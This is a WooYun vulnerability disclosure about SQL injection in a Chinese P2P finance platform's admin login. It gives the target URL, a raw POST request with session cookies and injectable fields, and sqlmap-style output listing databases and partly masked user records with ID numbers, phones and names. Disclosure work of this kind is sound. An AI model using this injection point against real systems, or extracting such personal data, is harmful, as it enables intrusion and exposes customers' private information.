P2P金融安全之中科创财富通SQL注入(敏感信息泄漏)

发表于 2015年07月14日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0126155

漏洞标题：P2P金融安全之中科创财富通SQL注入(敏感信息泄漏)

漏洞详情

披露状态：

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认，细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述：

详细说明：

http://www.88.com.cn:8090/admin/login

1	http://www.88.com.cn:8090/admin/login

风险管理平台88财富网简介：深圳市中科创财富通网络金融有限公司（以下简称"88财富"）成立于2012年10月，注册资金2亿元，注册地位于深圳前海，隶属于中科创金融控股集团有限公司（以下简称"中科创"）。88财富的股东中科创是全国首家综合金融集团，成立于2004年，注册资金2.11亿。作为深圳市政府认定的金融总部企业，中科创以北京、上海、广州、深圳、成都、江苏六大区域为核心，搭建了辐射华北、华东、华南、西南、深港五大区域综合金融及跨境金融服务中心。经过十多年的发展和战略布局，中科创形成了以财富管理、互联网金融、互联网地产、文化产业投资、家族办公室、资本投资为主营业务，配套中国财富俱乐部、中国财富艺术馆等高附加值平台的文化与综合金融相融合的服务体系。成立至今，注册会员超过20万名，累计管理资产超过500亿，已为上百家上市公司提供服务。同时，中科创下属子公司控股及参股A股、港股合计四家上市公司，包括禾盛新材（002290）、粤首环保（HK01191）。多年的沉淀也成就了中科创如今强大的影响力和号召力。2014年10月，中科创受邀参加APEC工商领导人峰会，并成为铂金赞助商。88财富也连续两届入选博鳌亚洲论坛合作伙伴，成为了首家亮相博鳌亚洲论坛的互联网金融企业。2015年4月，中科创签约国际钢琴巨星郎朗成为形象代言人。未来，中科创将打造国内最具实力的、千亿级的一揽子综合金融服务平台。

SQL注入一枚

POST /admin/login HTTP/1.1<br>
Host: www.88.com.cn:8090<br>
Proxy-Connection: keep-alive<br>
Content-Length: 15<br>
Cache-Control: max-age=0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
Origin: http://www.88.com.cn:8090<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded<br>
Referer: http://www.88.com.cn:8090/admin/login<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
Cookie: session=d641b6a49be51c2e7fdc82699e4d740925ca10a9%7E559bdb91b6af39-70662674; CNZZDATA1255422795=1709538840-1436275156-null%7C1436275156; Hm_lvt_69df81f3142d8f12121c95e5fabf3bd4=1436277652; Hm_lpvt_69df81f3142d8f12121c95e5fabf3bd4=1436277652; Hm_lvt_52ffe64979ed489f556330293003bf4d=1436277653; Hm_lpvt_52ffe64979ed489f556330293003bf4d=1436277653; PHPSESSID=113c7b5206dd4ec8a8d4e36f71bb3585account=1&psd=1

POST /admin/login HTTP/1.1

Host: www.88.com.cn:8090

Proxy-Connection: keep-alive

Content-Length: 15

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://www.88.com.cn:8090

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://www.88.com.cn:8090/admin/login

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: session=d641b6a49be51c2e7fdc82699e4d740925ca10a9%7E559bdb91b6af39-70662674; CNZZDATA1255422795=1709538840-1436275156-null%7C1436275156; Hm_lvt_69df81f3142d8f12121c95e5fabf3bd4=1436277652; Hm_lpvt_69df81f3142d8f12121c95e5fabf3bd4=1436277652; Hm_lvt_52ffe64979ed489f556330293003bf4d=1436277653; Hm_lpvt_52ffe64979ed489f556330293003bf4d=1436277653; PHPSESSID=113c7b5206dd4ec8a8d4e36f71bb3585account=1&psd=1

back-end DBMS: MySQL 5.1<br>
available databases [12]:<br>
[*] accounts_data<br>
[*] activities_data<br>
[*] billstable_data<br>
[*] information_schema<br>
[*] log_data<br>
[*] members_data<br>
[*] order_data<br>
[*] products_data<br>
[*] queue_data<br>
[*] senior_data<br>
[*] system_data<br>
[*] test

back-end DBMS: MySQL 5.1

available databases [12]:

[*] accounts_data

[*] activities_data

[*] billstable_data

[*] information_schema

[*] log_data

[*] members_data

[*] order_data

[*] products_data

[*] queue_data

[*] senior_data

[*] system_data

[*] test

泄露海量用户信息，下面随机列举证明

back-end DBMS: MySQL 5.1<br>
Database: members_data<br>
Table: data_xtorder<br>
[* entries]<br>
+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+<br>
| id | pid | myIntoID | IDcardNo           | yytime     | dotime     | mobile      | yymoney  | remarks | userName     | realName | productName |<br>
+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+<br>
| 46 | 45* | 29*2     | 11*1*6196*112**92* | 141*91*4** | 141*9*15** | 1*521*2**59 | 1******  | NULL    | **xj         | 姜**      |             |<br>
| 4* | 45* | 5*5*4    | 44***119***226**4* | 14191**6** | 1419*4**26 | 1*51**9**1* | 1******  | NULL    | guoweini     | 郭**    |             |<br>
| 4* | 45* | **451    | *2*21919***214*266 | 1419**24** | 141955**4* | 1*921*966** | 61*****  | NULL    | caiwenfeng   | 蔡**      |             |<br>
| 49 | 45* | 924**    | *2*2**1956111*1*14 | 1419**24** | 14195**252 | 1**12*55*** | 15*****  | NULL    | ZHOUJIANHENG | 周**     |             |<br>
| 5* | 452 | 2995     | 511*1119*51**1**61 | 142*56**** | 142*6*642* | 15******96* | 1******  | NULL    | 511*11zq     | 张*       | 国富天玺        |<br>
| 51 | 45* | *        | 42*1*619***5244425 | 1421164*** | 142121**19 | 1*1*12*1166 | 1******  | NULL    | tina***1     | 田*       |             |<br>
| 62 | *   | *        | <blank>            | 1422**6*5* | 1422**6*5* | 1*12625915* | 1******  | NULL    | 1*12625915*  | <blank>  | 国富天玺        |<br>
| 6* | 452 | *        | 44*1*119*4**1**614 | 142*49*6** | 142**5*221 | 1*52******* | ******** | NULL    | **_eadec*24  | 梁**      | 国富天玺        |

back-end DBMS: MySQL 5.1

Database: members_data

Table: data_xtorder

[* entries]

+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+

+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+

| 46 | 45* | 29*2 | 11*1*6196*112**92* | 141*91*4** | 141*9*15** | 1*521*2**59 | 1****** | NULL | **xj | 姜** | |

| 4* | 45* | 5*5*4 | 44***119***226**4* | 14191**6** | 1419*4**26 | 1*51**9**1* | 1****** | NULL | guoweini | 郭** | |

| 4* | 45* | **451 | *2*21919***214*266 | 1419**24** | 141955**4* | 1*921*966** | 61***** | NULL | caiwenfeng | 蔡** | |

| 49 | 45* | 924** | *2*2**1956111*1*14 | 1419**24** | 14195**252 | 1**12*55*** | 15***** | NULL | ZHOUJIANHENG | 周** | |

| 5* | 452 | 2995 | 511*1119*51**1**61 | 142*56**** | 142*6*642* | 15******96* | 1****** | NULL | 511*11zq | 张* | 国富天玺 |

| 51 | 45* | * | 42*1*619***5244425 | 1421164*** | 142121**19 | 1*1*12*1166 | 1****** | NULL | tina***1 | 田* | |

| 62 | * | * | <blank> | 1422**6*5* | 1422**6*5* | 1*12625915* | 1****** | NULL | 1*12625915* | <blank> | 国富天玺 |

| 6* | 452 | * | 44*1*119*4**1**614 | 142*49*6** | 142**5*221 | 1*52******* | ******** | NULL | **_eadec*24 | 梁** | 国富天玺 |

漏洞证明：

back-end DBMS: MySQL 5.1<br>
Database: members_data<br>
Table: data_xtorder<br>
[* entries]<br>
+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+<br>
| id | pid | myIntoID | IDcardNo           | yytime     | dotime     | mobile      | yymoney  | remarks | userName     | realName | productName |<br>
+----+-----+----------+--------------------+------------+------------+-------------+----------+---------+--------------+----------+-------------+<br>
| 46 | 45* | 29*2     | 11*1*6196*112**92* | 141*91*4** | 141*9*15** | 1*521*2**59 | 1******  | NULL    | **xj         | 姜**      |             |<br>
| 4* | 45* | 5*5*4    | 44***119***226**4* | 14191**6** | 1419*4**26 | 1*51**9**1* | 1******  | NULL    | guoweini     | 郭**    |             |<br>
| 4* | 45* | **451    | *2*21919***214*266 | 1419**24** | 141955**4* | 1*921*966** | 61*****  | NULL    | caiwenfeng   | 蔡**      |             |<br>
| 49 | 45* | 924**    | *2*2**1956111*1*14 | 1419**24** | 14195**252 | 1**12*55*** | 15*****  | NULL    | ZHOUJIANHENG | 周**     |             |<br>
| 5* | 452 | 2995     | 511*1119*51**1**61 | 142*56**** | 142*6*642* | 15******96* | 1******  | NULL    | 511*11zq     | 张*       | 国富天玺        |<br>
| 51 | 45* | *        | 42*1*619***5244425 | 1421164*** | 142121**19 | 1*1*12*1166 | 1******  | NULL    | tina***1     | 田*       |             |<br>
| 62 | *   | *        | <blank>            | 1422**6*5* | 1422**6*5* | 1*12625915* | 1******  | NULL    | 1*12625915*  | <blank>  | 国富天玺        |<br>
| 6* | 452 | *        | 44*1*119*4**1**614 | 142*49*6** | 142**5*221 | 1*52******* | ******** | NULL    | **_eadec*24  | 梁**      | 国富天玺        |